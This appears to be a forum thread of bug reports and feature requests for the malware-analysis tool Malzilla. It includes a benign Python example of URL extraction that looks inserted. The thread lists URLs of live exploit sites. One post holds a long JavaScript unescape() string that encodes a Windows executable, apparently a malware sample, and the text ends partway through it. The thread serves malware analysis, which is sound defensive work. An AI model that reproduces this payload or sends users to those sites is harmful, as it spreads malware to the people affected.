In latest development build I started the implementation of "awareness" about which tab called which download.
At the moment, I can't really recall what the current state of that part of the code is (for the last two months I didn't have even one single free minute of time for coding). I do not know if I ever finished that part or not :(
Blame my job for this (since May I'm working ~12 hours/day)
It can happen that the downloader thread does not check whether the tab still exists before it sends the data back to the tab (tab closed in the meanwhile). Check if that is the case.
Hopefully, winter will bring me some peace, so that I can get back to my hobbies :)
-
Hi Bobby,
is there an option to disable minimizing to traybar ?
Malzilla disappears from taskbar when minimized and so I can't switch back to Malzilla by Alt+Tab.
-
Bobby,
hehe no problem.
I don't have any sites with the select code in them, handy, but they usually use;
<select ...etc>
<option value="URL"...>
</select>
Or;
<select ...etc>
<option name="URL"...>
</select>
Or;
<select ...etc>
<option id="URL"...>
</select>
The structure and naming convention differs, but they're all related to the obfuscations that use HTML elements. The only others, are those that have the URL in the value var, which proceeds to the URL when clicked on (uses JS for the actual transfer).
-
@SysAdMini
There is no such option, but I'll implement it
@MysteryFCM
If I got it right, these URLs are not real HTML references (tags), but normal document data, just like the plain text on the site etc.
In that case, I assume it is wrong to get them extracted with the current parser.
The current parser follows the HTML rules about which element can contain some URL (image source, multimedia content, clickable links etc.) and it parses just these URLs.
What you would need is a raw parser which picks up every single URL from the HTML document, no matter if it is a URL reference in a tag or plain text on the site (non-clickable URL).
Did I get the whole idea right?
-
That's correct, yes :)
-
I will take care about raw parser, but it will be an extra option, not a main parser as it will miss all the relative links (which are now detected just because the current parser follows the HTML rules and knows which tag contains a link in which property).
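The trade-off discussed in the last few posts, shown side by side: a tag-aware extractor that resolves relative links, and a raw scanner that also sees URLs in `<option>` values, comments and plain text but only when they are absolute. This is an added example, not Malzilla's or vURL's code; the attribute list, the regular expression and the sample page with its `.example` hosts are assumptions constructed for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

LINK_ATTRS = {"href", "src", "data", "codebase"}  # assumed set of URL-bearing attributes
RAW_URL = re.compile(r"""(?:https?|ftp)://[^\s"'<>]+""", re.IGNORECASE)


class TagLinks(HTMLParser):
    """Follow HTML rules: take URLs only from link attributes, resolve them."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in LINK_ATTRS and value:
                self.links.add(urljoin(self.base_url, value.strip()))


def tag_links(html, base_url):
    parser = TagLinks(base_url)
    parser.feed(html)
    parser.close()
    return parser.links


def raw_links(html):
    """Scan the whole document as text; relative links cannot be found."""
    return {m.group(0).rstrip(".,;") for m in RAW_URL.finditer(html)}


def all_links(html, base_url):
    """Union of both passes, tagged with the pass that found each URL."""
    by_tag, by_raw = tag_links(html, base_url), raw_links(html)
    return {url: ("tag" if url in by_tag else "raw") for url in by_tag | by_raw}


# Constructed sample page; every host below is a placeholder.
BASE = "http://site.example/Blog/"
SAMPLE = """
<a href="../exploit/index.php">relative link</a>
<iframe src="http://frames.example/in.html"></iframe>
<select><option value="http://dropdown.example/go.php">pick</option></select>
<!-- http://comment.example/hidden.js -->
<p>see ftp://plain.example/file.bin, it is not clickable.</p>
"""

if __name__ == "__main__":
    for url, source in sorted(all_links(SAMPLE, BASE).items()):
        print(source, url)
```

Running both passes and merging the results keeps the resolved relative links from the tag pass while still surfacing the URLs that sit outside link attributes.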
-
Nice one, cheers :)
-
Bobby,
Couple more. On this one, Malzilla dives into "Out of memory" errors when trying to decode the following (copy/paste the code into the decoder tab, change the HTML element to the var etc etc);
http://miolana.com/forum/news.php?s=aec9dda79f
On this one, it fails to parse the SRC's from the iFrames;
http://www.everydaygame.net/Blog/
-
Another minor problem, it only seems to sporadically list the IP(s) of the domains being queried. For example, it fails to display the correct IP for the following (exploit folks, so don't load it in a browser ;))
http://a.nt002.cn/E/ff154/ff154.htm
-
Just a note, received an access violation when clicking to send this one to the links parser;
http://cnyswatmop.com
-
Hi Bobby,
there is something that annoys me daily. If I use multiple download tabs and switch between them, then Malzilla doesn't keep
the cursor position of tabs. It switches always to the top.
Example : I'm in the middle of the page in Tab1, switching to Tab2 and switching back to Tab1. Now I'm on top of Tab1 and no longer in the middle of the page.
So I have to search for the last position again.
-
Hi Steven, hi SysAdMini,
sorry about the lack of feedback from me, I didn't touch Malzilla code for months...
I got stuck into some real-life troubles, and I didn't get a lot of chances to do any coding.
If you get any HTML/JS code that makes trouble, please save a copy for me in case the content on the troublesome URL changes.
As for the cursor positions, I think I can fix that this week.
The main problem with the Malzilla is that I do not like the concept anymore.
We need full-blown browser engine for the today's malware.
This implies implementing the whole DOM document model which can be exposed to the JavaScript engine. That would solve all the problems with scripts that are requiring data from HTTP headers, and with the malware requesting data from HTML objects (GetElementByID etc.) or creating new HTML elements.
Those are just a few examples of missing things.
The problem is that the current Malzilla engine can't handle that kind of stuff.
Total rewrite is the only possible solution.
I already have a vision, but I'm missing spare time and some motivation... :(
-
Hi Bobby,
yes, Malzilla isn't perfect, but it's currently the best tool of this type. There is no alternate.
I tried FileInsight, but I don't think that it's an alternate.
No other tool than Malzilla has all these builtin features.
Please don't stop. Go ahead ! We need you.
-
Hi Bobby,
Are you still here? I have a problem when using Malzilla. I have code like below
var payload = unescape("%u5a4d%u0090%u0003%u0000%u0004%u0000%uffff%u0000%u00b8%u0000%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u00f0%u0000%u1f0e%u0eba%ub400%ucd09%ub821%u4c01%u21cd%u6854%u7369%u7020%u6f72%u7267%u6d61%u6320%u6e61%u6f6e%u2074%u6562%u7220%u6e75%u6920%u206e%u4f44%u2053%u6f6d%u6564%u0d2e%u0a0d%u0024%u0000%u0000%u0000%u8104%u6536%ue040%u3658%ue040%u3658%ue040%u3658%ub25e%u36dc%ue05b%u3658%ub25e%u36cd%ue051%u3658%ub25e%u36db%ue009%u3658%uef83%u3605%ue042%u3658%u2667%u3623%ue045%u3658%ue040%u3659%ue020%u3658%ub25e%u36d2%ue041%u3658%ub25e%u36c9%ue041%u3658%u6952%u6863%ue040%u3658%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u4550%u0000%u014c%u0004%u16b2%u4b4d%u0000%u0000%u0000%u0000%u00e0%u0103%u010b%u0009%u7000%u0000%u3000%u0000%u0000%u0000%u205f%u0000%u1000%u0000%u8000%u0000%u0000%u0040%u1000%u0000%u0200%u0000%u0005%u0000%u0000%u0000%u0005%u0000%u0000%u0000%ud000%u0000%u0400%u0000%u1c9a%u0001%u0003%u8100%u0000%u0010%u1000%u0000%u0000%u0010%u1000%u0000%u0000%u0000%u0010%u0000%u0000%u0000%u0000%u0000%u97ec%u0000%u0050%u0000%uc000%u0000%u01b4%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u94f0%u0000%u0040%u0000%u0000%u0000%u0000%u0000%u8000%u0000%u014c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u742e%u7865%u0074%u0000%u6eaa%u0000%u1000%u0000%u7000%u0000%u0400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0020%u6000%u722e%u6164%u6174%u0000%u1e96%u0000%u8000%u0000%u2000%u0000%u7400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%u4000%u642e%u7461%u0061%u0000%u17fc%u0000%ua000%u0000%u0e00%u0000%u9400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%uc000%u722e%u7273%u0063%u0000%u01b4%u0000%uc000%u0000%u0200%u0000%ua200%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%u4000%u0000%u0000%u0000%u0000%u0000%u
0040%uf883%u0f01%u8185%u0000%u3b00%u75fb%uff0f%u8bd6%u3bf8%u75fb%u3307%ue9c0%u00ca%u0000%uc78b%u3966%u741f%u400e%u6640%u1839%uf975%u4040%u3966%u7518%u8bf2%uc435%u4080%u5300%u5353%uc72b%ud153%u40f8%u5750%u5353%u4589%ufff4%u89d6%uf845%uc33b%u2f74%ue850%u0ec3%u0000%u8959%ufc45%uc33b%u2174%u5353%u75ff%u50f8%u75ff%u57f4%u5353%ud6ff%uc085%u0c75%u75ff%ue8fc%u0e13%u0000%u8959%ufc5d%u5d8b%u57fc%u15ff%u80c0%u0040%uc38b%u5ceb%uf883%u7402%u3b04%u75c3%uff82%ubc15%u4080%u8b00%u3bf0%u0ff3%u7284%uffff%u38ff%u741e%u400a%u1838%ufb75%u3840%u7518%u2bf6%u40c6%u8950%uf845%u5ce8%u000e%u8b00%u59f8%ufb3b%u0c75%uff56%ub815%u4080%ue900%uff45%uffff%u75ff%u56f8%ue857%u1242%u0000%uc483%u560c%u15ff%u80b8%u0040%uc78b%u5e5f%uc95b%u6ac3%u6854%u9650%u0040%uc5e8%u0002%u3300%u89ff%ufc7d%u458d%u509c%u15ff%u80d4%u0040%u45c7%ufefc%uffff%u6aff%u6a40%u5e20%ue856%u0e46%u0000%u5959%uc73b%u840f%u0214%u0000%ue0a3%u40b6%u8900%ud835%u40b6%u8d00%u0088%u0008%ueb00%uc630%u0440%u8300%uff08%u40c6%u0a05%u7889%uc608%u2440%uc600%u2540%uc60a%u2640%u890a%u3878%u40c6%u0034%uc083%u8b40%ue00d%u40b6%u8100%u00c1%u0008%u3b00%u72c1%u66cc%u7d39%u0fce%u0a84%u0001%u8b00%ud045%uc73b%u840f%u00ff%u0000%u388b%u588d%u8d04%u3b04%u4589%ubee4%u0800%u0000%ufe3b%u027c%ufe8b%u45c7%u01e0%u0000%ueb00%u6a5b%u6a40%ue820%u0db8%u0000%u5959%uc085%u5674%u4d8b%u8de0%u8d0c%ub6e0%u0040%u0189%u0583%ub6d8%u0040%u8d20%u0090%u0008%ueb00%uc62a%u0440%u8300%uff08%u40c6%u0a05%u6083%u0008%u6080%u8024%u40c6%u0a25%u40c6%u0a26%u6083%u0038%u40c6%u0034%uc083%u8b40%u0311%u3bd6%u72c2%uffd2%ue045%u3d39%ub6d8%u0040%u9d7c%u06eb%u3d8b%ub6d8%u0040%u6583%u00e0%uff85%u6d7e%u458b%u8be4%u8308%ufff9%u5674%uf983%u74fe%u8a51%ua803%u7401%ua84b%u7508%u510b%u15ff%u80d0%u0040%uc085%u3c74%u758b%u8be0%uc1c6%u05f8%ue683%uc11f%u06e6%u3403%ue085%u40b6%u8b00%ue445%u008b%u0689%u038a%u4688%u6804%u0fa0%u0000%u468d%u500c%u35e8%u001a%u5900%u8559%u0fc0%uc984%u0000%uff00%u0846%u45ff%u43e0%u4583%u04e4%u7d39%u7ce0%u3393%u8bdb%uc1f3%u06e6%u3503%ub6e0%u0040%u068b%uf883%u74ff%u830b%ufef8%u0674%u4e80%u80
04%u72eb%u46c6%u8104%udb85%u0575%uf66a%ueb58%u8b0a%u48c3%ud8f7%uc01b%uc083%u50f5%u15ff%u80b4%u0040%uf88b%uff83%u74ff%u8543%u74ff%u573f%u15ff%u80d0%u0040%uc085%u3474%u3e89%uff25%u0000%u8300%u02f8%u0675%u4e80%u4004%u09eb%uf883%u7503%u8004%u044e%u6808%u0fa0%u0000%u468d%u500c%u9fe8%u0019%u5900%u8559%u74c0%uff37%u0846%u0aeb%u4e80%u4004%u06c7%ufffe%uffff%u8343%u03fb%u8c0f%uff67%uffff%u35ff%ub6d8%u0040%u15ff%u80cc%u0040%uc033%u11eb%uc033%uc340%u658b%uc7e8%ufc45%ufffe%uffff%uc883%ue8ff%u00c3%u0000%u8bc3%u56ff%u50b8%u4095%ube00%u9550%u0040%u8b57%u3bf8%u73c6%u8b0f%u8507%u74c0%uff02%u83d0%u04c7%ufe3b%uf172%u5e5f%u8bc3%u56ff%u58b8%u4095%ube00%u9558%u0040%u8b57%u3bf8%u73c6%u8b0f%u8507%u74c0%uff02%u83d0%u04c7%ufe3b%uf172%u5e5f%u8bc3%u55ff%uec8b%uc033%u4539%u6a08%u0f00%uc094%u0068%u0010%u5000%u15ff%u80dc%u0040%u1ca3%u40b1%u8500%u75c0%u5d02%u33c3%u40c0%ud4a3%u40b6%u5d00%uccc3%u9068%u4041%u6400%u35ff%u0000%u0000%u448b%u1024%u6c89%u1024%u6c8d%u1024%ue02b%u5653%ua157%ua8b4%u0040%u4531%u33fc%u50c5%u6589%uffe8%uf875%u458b%uc7fc%ufc45%ufffe%uffff%u4589%u8df8%uf045%ua364%u0000%u0000%u8bc3%uf04d%u8964%u000d%u0000%u5900%u5f5f%u5b5e%ue58b%u515d%uccc3%ucccc%ucccc%ucccc%uff8b%u8b55%u83ec%u18ec%u8b53%u0c5d%u8b56%u0873%u3533%ua8b4%u0040%u8b57%uc606%uff45%uc700%uf445%u0001%u0000%u7b8d%u8310%ufef8%u0d74%u4e8b%u0304%u33cf%u380c%uf1e8%u0001%u8b00%u0c4e%u468b%u0308%u33cf%u380c%ue1e8%u0001%u8b00%u0845%u40f6%u6604%u850f%u0116%u0000%u4d8b%u8d10%ue855%u5389%u8bfc%u0c5b%u4589%u89e8%uec4d%ufb83%u74fe%u8d5f%u0049%u048d%u8b5b%u864c%u8d14%u8644%u8910%uf045%u008b%u4589%u85f8%u74c9%u8b14%ue8d7%u265c%u0000%u45c6%u01ff%uc085%u407c%u477f%u458b%u8bf8%u83d8%ufef8%uce75%u7d80%u00ff%u2474%u068b%uf883%u74fe%u8b0d%u044e%ucf03%u0c33%ue838%u016e%u0000%u4e8b%u8b0c%u0856%ucf03%u0c33%ue83a%u015e%u0000%u458b%u5ff4%u5b5e%ue58b%uc35d%u45c7%u00f4%u0000%ueb00%u8bc9%u084d%u3981%u7363%ue06d%u2975%u3d83%ub6d0%u0040%u7400%u6820%ub6d0%u0040%u83e8%u0014%u8300%u04c4%uc085%u0f74%u558b%u6a08%u5201%u15ff%ub6d0%u0040%uc483%u8b08%u0c4d%uffe8
%u0025%u8b00%u0c45%u5839%u740c%u6812%ua8b4%u0040%u8b57%u8bd3%ue8c8%u2602%u0000%u458b%u8b0c%uf84d%u4889%u8b0c%u8306%ufef8%u0d74%u4e8b%u0304%u33cf%u380c%udbe8%u0000%u8b00%u0c4e%u568b%u0308%u33cf%u3a0c%ucbe8%u0000%u8b00%uf045%u488b%u8b08%ue8d7%u2595%u0000%ufeba%uffff%u39ff%u0c53%u840f%uff52%uffff%ub468%u40a8%u5700%ucb8b%uade8%u0025%ue900%uff1c%uffff%uff8b%u8b55%u83ec%u10ec%ub4a1%u40a8%u8300%uf865%u8300%ufc65%u5300%ubf57%ue64e%ubb40%u00bb%uff00%u3bff%u74c7%u850d%u74c3%uf709%ua3d0%ua8b8%u0040%u60eb%u8d56%uf845%uff50%uf415%u4080%u8b00%ufc75%u7533%ufff8%uf015%u4080%u3300%ufff0%uac15%u4080%u3300%ufff0%uec15%u4080%u3300%u8df0%uf045%uff50%ue815%u4080%u8b00%uf445%u4533%u33f0%u3bf0%u75f7%ube07%ue64f%ubb40%u0beb%uf385%u0775%uc68b%ue0c1%u0b10%u89f0%ub435%u40a8%uf700%u89d6%ub835%u40a8%u5e00%u5b5f%uc3c9%u2583%ub6cc%u0040%uc300%u0d3b%ua8b4%u0040%u0275%uc3f3%u12e9%u0025%ucc00%ucccc%ucccc%ucccc%u548b%u0c24%u4c8b%u0424%ud285%u6974%uc033%u448a%u0824%uc084%u1675%ufa81%u0100%u0000%u0e72%u3d83%ub6b0%u0040%u7400%ue905%u263c%u0000%u8b57%u83f9%u04fa%u3172%ud9f7%ue183%u7403%u2b0c%u88d1%u8307%u01c7%ue983%u7501%u8bf6%uc1c8%u08e0%uc103%uc88b%ue0c1%u0310%u8bc1%u83ca%u03e2%ue9c1%u7402%uf306%u85ab%u74d2%u880a%u8307%u01c7%uea83%u7501%u8bf6%u2444%u5f08%u8bc3%u2444%uc304%uff8b%u8b55%u8bec%u0845%uc085%u1274%ue883%u8108%udd38%u00dd%u7500%u5007%u98e8%u0007%u5900%uc35d%uff8b%u8b55%u83ec%u14ec%ub4a1%u40a8%u3300%u89c5%ufc45%u5653%udb33%u8b57%u39f1%u201d%u40b1%u7500%u5338%u3353%u47ff%u6857%u88d0%u0040%u0068%u0001%u5300%u15ff%u8100%u0040%uc085%u0874%u3d89%ub120%u0040%u15eb%u15ff%u8018%u0040%uf883%u7578%uc70a%u2005%u40b1%u0200%u0000%u3900%u145d%u227e%u4d8b%u8b14%u1045%u3849%u7418%u4008%ucb3b%uf675%uc983%u8bff%u1445%uc12b%u3b48%u1445%u017d%u8940%u1445%u20a1%u40b1%u8300%u02f8%u840f%u01ac%u0000%uc33b%u840f%u01a4%u0000%uf883%u0f01%ucc85%u0001%u8900%uf85d%u5d39%u7520%u8b08%u8b06%u0440%u4589%u8b20%ufc35%u4080%u3300%u39c0%u245d%u5353%u75ff%u0f14%uc095%u75ff%u8d10%uc504%u0001%u0000%uff50%u2075%ud6ff%uf88b%ufb3b%u840f%u
018f%u0000%u437e%ue06a%ud233%uf758%u83f7%u02f8%u3772%u448d%u083f%u003d%u0004%u7700%ue813%u293c%u0000%uc48b%uc33b%u1c74%u00c7%ucccc%u0000%u11eb%ue850%u285a%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%u4589%uebf4%u8903%uf45d%u5d39%u0ff4%u3e84%u0001%u5700%u75ff%ufff4%u1475%u75ff%u6a10%uff01%u2075%ud6ff%uc085%u840f%u00e3%u0000%u358b%u8100%u0040%u5353%uff57%uf475%u75ff%uff0c%u0875%ud6ff%uc88b%u4d89%u3bf8%u0fcb%uc284%u0000%uf700%u0c45%u0400%u0000%u2974%u5d39%u0f1c%ub084%u0000%u3b00%u1c4d%u8f0f%u00a7%u0000%u75ff%uff1c%u1875%uff57%uf475%u75ff%uff0c%u0875%ud6ff%u90e9%u0000%u3b00%u7ecb%u6a45%u33e0%u58d2%uf1f7%uf883%u7202%u8d39%u0944%u3d08%u0400%u0000%u1677%u7de8%u0028%u8b00%u3bf4%u74f3%uc76a%ucc06%u00cc%u8300%u08c6%u1aeb%ue850%u2798%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%uf08b%u02eb%uf633%uf33b%u4174%u75ff%u56f8%uff57%uf475%u75ff%uff0c%u0875%u15ff%u8100%u0040%uc085%u2274%u5353%u5d39%u751c%u5304%ueb53%uff06%u1c75%u75ff%uff18%uf875%u5356%u75ff%uff20%uc415%u4080%u8900%uf845%ue856%ufdb8%uffff%uff59%uf475%uafe8%ufffd%u8bff%uf845%ue959%u0159%u0000%u5d89%u89f4%uf05d%u5d39%u7508%u8b08%u8b06%u1440%u4589%u3908%u205d%u0875%u068b%u408b%u8904%u2045%u75ff%ue808%u24ba%u0000%u8959%uec45%uf883%u75ff%u3307%ue9c0%u0121%u0000%u453b%u0f20%udb84%u0000%u5300%u8d53%u144d%uff51%u1075%uff50%u2075%ud8e8%u0024%u8300%u18c4%u4589%u3bf4%u74c3%u8bd4%uf835%u4080%u5300%uff53%u1475%uff50%u0c75%u75ff%uff08%u89d6%uf845%uc33b%u0775%uf633%ub7e9%u0000%u7e00%u833d%ue0f8%u3877%uc083%u3d08%u0400%u0000%u1677%u67e8%u0027%u8b00%u3bfc%u74fb%uc7dd%ucc07%u00cc%u8300%u08c7%u1aeb%ue850%u2682%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%uf88b%u02eb%uff33%ufb3b%ub474%u75ff%u53f8%ue857%ufc5e%uffff%uc483%uff0c%uf875%uff57%u1475%u75ff%ufff4%u0c75%u75ff%uff08%u89d6%uf845%uc33b%u0475%uf633%u25eb%u75ff%u8d1c%uf845%u75ff%u5018%uff57%u2075%u75ff%ue8ec%u2427%u0000%uf08b%u7589%u83f0%u18c4%udef7%uf61b%u7523%u57f8%u8de8%ufffc%u59ff%u1aeb%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%uff0c%u0875%u15ff%u80f8%u0040%uf08b%u5d39%u74
f4%uff09%uf475%u18e8%u0004%u5900%u458b%u3bf0%u74c3%u390c%u1845%u0774%ue850%u0405%u0000%u8b59%u8dc6%ue065%u5e5f%u8b5b%ufc4d%ucd33%uade8%ufffb%uc9ff%u8bc3%u55ff%uec8b%uec83%uff10%u0875%u4d8d%ue8f0%ud4fd%uffff%u75ff%u8d28%uf04d%u75ff%uff24%u2075%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%ue80c%ufc28%uffff%uc483%u8020%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u8b55%u51ec%ua151%ua8b4%u0040%uc533%u4589%ua1fc%ub124%u0040%u5653%udb33%u8b57%u3bf9%u75c3%u8d3a%uf845%u3350%u46f6%u6856%u88d0%u0040%uff56%u0815%u4081%u8500%u74c0%u8908%u2435%u40b1%ueb00%uff34%u1815%u4080%u8300%u78f8%u0a75%u026a%ua358%ub124%u0040%u05eb%u24a1%u40b1%u8300%u02f8%u840f%u00cf%u0000%uc33b%u840f%u00c7%u0000%uf883%u0f01%ue885%u0000%u8900%uf85d%u5d39%u7518%u8b08%u8b07%u0440%u4589%u8b18%ufc35%u4080%u3300%u39c0%u205d%u5353%u75ff%u0f10%uc095%u75ff%u8d0c%uc504%u0001%u0000%uff50%u1875%ud6ff%uf88b%ufb3b%u840f%u00ab%u0000%u3c7e%uff81%ufff0%u7fff%u3477%u448d%u083f%u003d%u0004%u7700%ue813%u2580%u0000%uc48b%uc33b%u1c74%u00c7%ucccc%u0000%u11eb%ue850%u249e%u0000%u3b59%u74c3%uc709%udd00%u00dd%u8300%u08c0%ud88b%udb85%u6974%u048d%u503f%u006a%ue853%ufa7c%uffff%uc483%u570c%uff53%u1075%u75ff%u6a0c%uff01%u1875%ud6ff%uc085%u1174%u75ff%u5014%uff53%u0875%u15ff%u8108%u0040%u4589%u53f8%uc9e8%ufffa%u8bff%uf845%ueb59%u3375%u39f6%u1c5d%u0875%u078b%u408b%u8914%u1c45%u5d39%u7518%u8b08%u8b07%u0440%u4589%uff18%u1c75%udbe8%u0021%u5900%uf883%u75ff%u3304%uebc0%u3b47%u1845%u1e74%u5353%u4d8d%u5110%u75ff%u500c%u75ff%ue818%u2203%u0000%uf08b%uc483%u3b18%u74f3%u89dc%u0c75%u75ff%uff14%u1075%u75ff%uff0c%u0875%u75ff%uff1c%u0415%u4081%u8b00%u3bf8%u74f3%u5607%u06e8%u0002%u5900%uc78b%u658d%u5fec%u5b5e%u4d8b%u33fc%ue8cd%uf9ae%uffff%uc3c9%uff8b%u8b55%u83ec%u10ec%u75ff%u8d08%uf04d%ufee8%uffd2%uffff%u2475%u4d8d%ufff0%u2075%u75ff%uff1c%u1875%u75ff%uff14%u1075%u75ff%ue80c%ufe16%uffff%uc483%u801c%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u5756%uf633%u28bf%u40b1%u8300%uf53c%ua8c4%u0040%u7501%u8d1e%uf504%ua8c0%u0040%u3889%ua068%u000f%uff00%u8330%u18c7
%u8fe8%u000f%u5900%u8559%u74c0%u460c%ufe83%u7c24%u33d2%u40c0%u5e5f%u83c3%uf524%ua8c0%u0040%u3300%uebc0%u8bf1%u53ff%u1d8b%u80d8%u0040%ube56%ua8c0%u0040%u8b57%u853e%u74ff%u8313%u047e%u7401%u570d%ud3ff%ue857%u013f%u0000%u2683%u5900%uc683%u8108%ue0fe%u40a9%u7c00%ubedc%ua8c0%u0040%u8b5f%u8506%u74c0%u8309%u047e%u7501%u5003%ud3ff%uc683%u8108%ue0fe%u40a9%u7c00%u5ee6%uc35b%uff8b%u8b55%u8bec%u0845%u34ff%uc0c5%u40a8%uff00%u0c15%u4081%u5d00%u6ac3%u680c%u9670%u0040%u1be8%ufff6%u33ff%u47ff%u7d89%u33e4%u39db%u1c1d%u40b1%u7500%ue818%ued31%uffff%u1e6a%u7fe8%uffeb%u68ff%u00ff%u0000%uc1e8%uffe8%u59ff%u8b59%u0875%u348d%uc0f5%u40a8%u3900%u741e%u8b04%uebc7%u6a6e%ue818%u0137%u0000%u8b59%u3bf8%u75fb%ue80f%ud6a6%uffff%u00c7%u000c%u0000%uc033%u51eb%u0a6a%u59e8%u0000%u5900%u5d89%u39fc%u751e%u682c%u0fa0%u0000%ue857%u0e86%u0000%u5959%uc085%u1775%ue857%u006d%u0000%ue859%ud670%uffff%u00c7%u000c%u0000%u5d89%uebe4%u890b%ueb3e%u5707%u52e8%u0000%u5900%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%uf5b3%uffff%u6ac3%ue80a%uff28%uffff%uc359%uff8b%u8b55%u8bec%u0845%u8d56%uc534%ua8c0%u0040%u3e83%u7500%u5013%u22e8%uffff%u59ff%uc085%u0875%u116a%ub5e8%uffe7%u59ff%u36ff%u15ff%u8110%u0040%u5d5e%u6ac3%u680c%u9690%u0040%u25e8%ufff5%u8bff%u0875%uf685%u7574%u3d83%ub6d4%u0040%u7503%u6a43%ue804%uffaa%uffff%u8359%ufc65%u5600%u95e8%u0010%u5900%u4589%u85e4%u74c0%u5609%ue850%u10b6%u0000%u5959%u45c7%ufefc%uffff%ue8ff%u000b%u0000%u7d83%u00e4%u3775%u75ff%ueb08%u6a0a%ue804%ufe96%uffff%uc359%u6a56%uff00%u1c35%u40b1%uff00%ue415%u4080%u8500%u75c0%ue816%ud592%uffff%uf08b%u15ff%u8018%u0040%ue850%ud542%uffff%u0689%ue859%uf4e9%uffff%u8bc3%u55ff%uec8b%u5756%uf633%u75ff%ue808%u2134%u0000%uf88b%u8559%u75ff%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uca75%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u3357%u6af6%uff00%u0c75%u75ff%ue808%u21e4%u0000%uf88b%uc483%u850c%u75ff%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u
83f0%ufff8%uc375%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u3357%ufff6%u0c75%u75ff%ue808%u22b8%u0000%uf88b%u5959%uff85%u2c75%u4539%u740c%u3927%u7805%u40b2%u7600%u561f%u15ff%u803c%u0040%u868d%u03e8%u0000%u053b%ub278%u0040%u0376%uc883%u8bff%u83f0%ufff8%uc175%uc78b%u5e5f%uc35d%uff8b%u8b55%u56ec%u758b%u8508%u0ff6%u8184%u0001%uff00%u0476%u7ae8%ufffe%uffff%u0876%u72e8%ufffe%uffff%u0c76%u6ae8%ufffe%uffff%u1076%u62e8%ufffe%uffff%u1476%u5ae8%ufffe%uffff%u1876%u52e8%ufffe%uffff%ue836%ufe4b%uffff%u76ff%ue820%ufe43%uffff%u76ff%ue824%ufe3b%uffff%u76ff%ue828%ufe33%uffff%u76ff%ue82c%ufe2b%uffff%u76ff%ue830%ufe23%uffff%u76ff%ue834%ufe1b%uffff%u76ff%ue81c%ufe13%uffff%u76ff%ue838%ufe0b%uffff%u76ff%ue83c%ufe03%uffff%uc483%uff40%u4076%uf8e8%ufffd%uffff%u4476%uf0e8%ufffd%uffff%u4876%ue8e8%ufffd%uffff%u4c76%ue0e8%ufffd%uffff%u5076%ud8e8%ufffd%uffff%u5476%ud0e8%ufffd%uffff%u5876%uc8e8%ufffd%uffff%u5c76%uc0e8%ufffd%uffff%u6076%ub8e8%ufffd%uffff%u6476%ub0e8%ufffd%uffff%u6876%ua8e8%ufffd%uffff%u6c76%ua0e8%ufffd%uffff%u7076%u98e8%ufffd%uffff%u7476%u90e8%ufffd%uffff%u7876%u88e8%ufffd%uffff%u7c76%u80e8%ufffd%u83ff%u40c4%ub6ff%u0080%u0000%u72e8%ufffd%uffff%u84b6%u0000%ue800%ufd67%uffff%ub6ff%u0088%u0000%u5ce8%ufffd%uffff%u8cb6%u0000%ue800%ufd51%uffff%ub6ff%u0090%u0000%u46e8%ufffd%uffff%u94b6%u0000%ue800%ufd3b%uffff%ub6ff%u0098%u0000%u30e8%ufffd%uffff%u9cb6%u0000%ue800%ufd25%uffff%ub6ff%u00a0%u0000%u1ae8%ufffd%uffff%ua4b6%u0000%ue800%ufd0f%uffff%ub6ff%u00a8%u0000%u04e8%ufffd%u83ff%u2cc4%u5d5e%u8bc3%u55ff%uec8b%u8b56%u0875%uf685%u3574%u068b%u053b%uaaa8%u0040%u0774%ue850%ufce1%uffff%u8b59%u0446%u053b%uaaac%u0040%u0774%ue850%ufccf%uffff%u8b59%u0876%u353b%uaab0%u0040%u0774%ue856%ufcbd%uffff%u5e59%uc35d%uff8b%u8b55%u56ec%u758b%u8508%u74f6%u8b7e%u0c46%u053b%uaab4%u0040%u0774%ue850%ufc9b%uffff%u8b59%u1046%u053b%uaab8%u0040%u0774%ue850%ufc89%uffff%u8b59%u1446%u053b%uaabc%u0040%u0774%ue850%ufc77%uffff%u8b59%u1846%u053b%uaac0%u0040%u0774%ue850%ufc65%uffff%u8b59%u1c46%u053b%uaac4%u0040%u0774%ue850%ufc53%uffff%u8b
